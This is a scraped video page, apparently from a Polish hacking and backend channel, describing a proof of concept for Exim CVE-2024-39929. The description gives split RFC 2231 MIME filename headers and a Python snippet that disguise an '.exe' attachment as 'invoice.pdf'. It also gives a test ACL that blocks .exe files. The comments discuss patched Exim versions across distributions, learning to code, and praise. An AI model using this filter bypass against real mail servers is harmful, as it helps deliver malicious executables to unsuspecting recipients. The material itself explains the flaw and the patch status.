log.069 POC Exploit to Exim CVE-2024-39929 written in python + chatgpt MIME content exe bypass
Вставка
- Опубліковано 15 сер 2024
- TLDR; 7:54
Core:
Content-Type: application/octet-stream;
name*0*="example4";
name*1*=".exe"
Content-Transfer-Encoding: BASE64
Python addons:
part.add_header(
'Content-Type',
'application/octet-stream; name*0*="invoice.pdf"; name*1*=".exe"'
)
part.add_header(
'Content-Transfer-Encoding',
'BASE64'
)
ACL for testing:
acl_check_mime:
deny message = Unsafe message refused CVE ($mime_filename).
condition = ${if match {${lc:$mime_filename}}{\N\.exe$\N}}
accept
log_message = XXX4 End Accept
#exim #hacking #mta #smtp #linux
Jest napisane, że problem rozwiązany w exim 4.83 rc3
Od wersji 4.98 to jest załatane. To, że na stronie projektu wisi od dwóch tygodni, nie oznacza że wszystkie distra ogarnęły już paczki u siebie:
Na filmie jest archlinux co dalej ma 4.97 jako najnowsza podobnie z Ubuntu 24 Noble lub Fedorze 41.
W Debianie 12 Bookworm 4.96 jeszcze starsze.
Nawet sysadmini robiący codziennie update mogą co najwyżej sami kompilować z oficjalnego repo jak nie ma nowszej wersji w menadżerze paczek.
nie znam się na programowaniu ale ciekawie mi się to ogląda
Zajebisty content 🫡
Subskrybuje ten kanał od pewnego czasu i w sumie w tym samym momencie zacząłem uczyć się Pythona. Powoli, codziennie po godzinie, czasem co drugi dzień. Wszyscy piszą, że znalezienie pierwszej pracy to najtrudniejsza rzecz. Zastanawia mnie jak wyglada wiedza którą tu przekazujesz z poziomu juniora, który pracuje jako programista np rok czasu. Programuje ucząc się i robiąc mini projekty ale są one prymitywne.To jak ćwiczenie pisania pojedynczej litery a tu patrzę jak ktoś pisze rozprawkę z Polaka na maturze .
Ćwiczenia czynią mistrza. Z każdym kolejnym tygodniem będzie szło Ci coraz lepiej i bardziej skomplikowane zagadnienia uda się rozwiązać. Na rekrutacje najlepiej opanować wszystkie problemy z leetcode.com/problemset/, bo co prawda mają mało wspólnego z realną pracą potem, ale takie realia testów kompetencyjnych i zagadek matematycznych rodem ze świata akademickiego. Ja uwielbiam backend i to pokazuję, a jednocześnie są to jakieś życiowe przykłady, a nie obliczenia punktu przecięcia dwóch funkcji. Myslę, że nawet dla seniora co robi we frontendzie takie sztuczki z MIME do Exima mogą być ciekawą odskocznią od codziennej rutyny w CSS i Javascript.
Chat postfix vs virgin exim
Dwa filmiki w krótkim czasie szefie?
Takie upały na dworze, że tylko w piwnicy można wysiedzieć i wbijać kolejny level ^^
@@patodeweloperka Dobrze ogarnięta piwnica to przyjemna miejscówka. ^^
Drobna uwaga. Mówi się "po linii najmniejszego oporu". Opowiadasz o profesjonalnych rzeczach w nieprofesjonalny sposób co pomniejsza wartość materiału.